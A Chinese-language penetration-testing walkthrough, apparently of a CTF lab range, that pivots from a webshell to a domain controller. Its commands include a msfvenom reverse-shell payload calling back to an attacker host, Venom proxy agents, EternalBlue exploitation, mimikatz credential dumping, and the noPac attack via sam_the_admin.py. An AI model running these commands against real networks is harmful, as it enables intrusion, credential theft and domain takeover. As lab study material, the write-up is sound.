内网渗透
拿到webshell之后,进⾏进⼀步内⽹信息收集,收集哪些信息:
操作系统权限,IP段,杀毒软件,端⼝服务,补丁systeminfo,⽹络链接会话,共享
域控判断⽅式:systeminfo中存在⼀个域,如果存在内⽹域,则这个就是内⽹的域服务器,可以直接进⾏ping
操作,ping之后会有IP回显
例子
ifconfig查看网卡情况发现还有一张10.0.1.0/24段的网卡
这里方便的话其实可以使用cs上线linux后用cs继续打,这里我就没有上线cs,使用linux的命令对10.0.1.0/24段探测存货主机
for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done
ping一下是存活的
使用毒液把流量代理出来,首先开启监听
admin.exe -lport 7777
然后上传agent_linux到靶机上
加权并执行
chmod 777 agent_linux_x86
agent_linux_x86 -rhost 192.168.1.105 -rport 7777
连接成功
这里本来准备用毒液的代理到msf打的,后面觉得比较麻烦,就直接用kali生成的elf马上线msf了
首先生成一个32位的elf马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
然后加权并执行
chmod 777 shell.elf
./shell
kali使用exploit/multi/handler
进行监听
获取到宿主机的shell
然后添加10.0.1.0/24段的路由
bg
route add 10.0.1.0 255.255.255.0 1
route print
然后配置proxychain4.conf
文件并使用socks模块
search socks
use auxiliary/sevrer/socks_proxy
run
我们在之前已经知道了内网主机的ip,那么这里我们直接使用proxychain配合nmap对10.0.1.7的端口进行扫描
proxychains4 nmap -sT -Pn 10.0.1.7
发现有445端口,那么对445端口进一步扫描
先确定一下系统版本,使用auxiliary/scanner/smb/smb_version模块,发现是win7 sp1
看能不能利用永恒之蓝,这里使用到auxiliary/scanner/smb/smb_ms17_010模块,发现可以利用永恒之蓝
使用exploit/windows/smb/ms17_010_eternalbule模块,因为是不出网环境,这里需要用到bind_tcp载荷
run之后拿到一个system权限的meterpreter
在C:\Users\root\Desktop下拿到第二个flag
然后继续进行信息搜集,发现同样是双网卡,还存在10.0.0.0/24段的一张网卡
ipconfig /all看到dns服务器为redteam.lab应该在域内
这里ping一下redteam.lab得到域控的ip为10.0.0.12
这里不知道域控有什么洞,先上传一个mimikatz把密码抓取出来,得到Administrator/Admin12345,这里其实就可以使用域管账户ipc直接连接,但是这里抓到了一个域用户,尝试使用最新的CVE-2021-42287、CVE-2021-42278来进行攻击
privilege::debug
sekurlsa::logonpasswords
这里我准备使用noPac.exe直接去获取一个shell的,但是这里noPac.exe的利用条件是需要主机上有.net4.0环境,所以这里没有回显
本来准备一步一步的用原始的方法打的,但是powershell用不了没有回显,就写一下原始利用的步骤吧
首先创建一个机器账户,可以使用 impacket 的 addcomputer.py或是powermadaddcomputer.py
是利用SAMR协议
创建机器账户,这个方法所创建的机器账户没有SPN,所以可以不用清除
1
清除机器账户的servicePrincipalName属性
将机器账户的sAMAccountName,更改为DC的机器账户名字,注意后缀不带$
为机器账户请求TGT
将机器账户的sAMAccountName更改为其他名字,不与步骤3重复即可
通过S4U2self协议向DC请求ST
进行 DCsync Attack
这里直接使用sam_the_admin.py进行攻击
proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell
即可拿到DC的shell
在C:\Users\Administrator\Desktop
下找到最后一个flag